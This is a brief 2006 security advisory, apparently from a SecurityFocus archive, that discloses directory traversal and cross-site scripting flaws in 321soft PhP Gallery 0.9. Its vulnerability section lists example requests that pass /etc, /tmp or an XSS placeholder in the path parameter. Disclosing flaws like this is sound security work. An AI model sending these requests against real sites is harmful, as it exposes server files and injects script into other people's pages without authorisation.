321soft PhP Gallery 0.9 - directory travel & XSS May 02 2006 11:41PM
d4igoro gmail com
321soft PhP Gallery 0.9 - directory travel & XSS

--------------------------------------------------------

Software: 321soft PhP Gallery

Version: 0.9

Type: directory travel & XSS

Date: Mai 3 01:38:04 CEST 2006

Vendor: 321soft.de

Page: http://321soft.de/

Risc: Middle

credits:

----------------------------

d4igoro - d4igoro[at]gmail[dot]com

http://d4igoro.blogspot.com/

vulnerability:

----------------------------

http://[target]/index.php?path=/etc

http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:

----------------------------

index.php

fix $path

notes:

----------------------------

The vendor has been informed.

http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.htm
l

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus